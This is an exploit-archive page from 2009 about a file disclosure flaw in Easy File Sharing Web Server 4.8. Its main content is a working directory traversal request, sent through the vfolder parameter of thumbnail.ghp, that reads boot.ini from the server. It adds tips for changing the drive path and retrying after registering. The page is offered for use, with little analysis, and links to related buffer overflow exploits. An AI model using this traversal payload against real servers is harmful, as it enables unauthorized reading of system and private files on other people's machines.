Easy File Sharing Web Server 4.8 File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Easy File Sharing Web Server 4.8 File Disclosure Vulnerability
# Published : 2009-03-04
# Author : Stack
# Previous Title : EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)
# Next Title : EFS Easy Chat Server Authentication Request BOF Exploit (SEH)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Easy File Sharing Web Server File Disclouse Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Program:  Easy File Sharing Web Server
Version:  4.8
Download: http://www.sharing-file.com/efssetup.exe
Found by Mountassif Moad
www.v4-team.com

-- Bug --
Exploit :

http://127.0.0.1/disk_c/thumbnail.ghp?vfolder=../../.././/./../../boot.ini
if you have a hard disk like d or f you change disk_c by disk_d or disk_f some host dont have this
and if dont work in first test try to register and test another time
Tested on win xp SP 2 fr

# www.Syue.com [2009-03-04]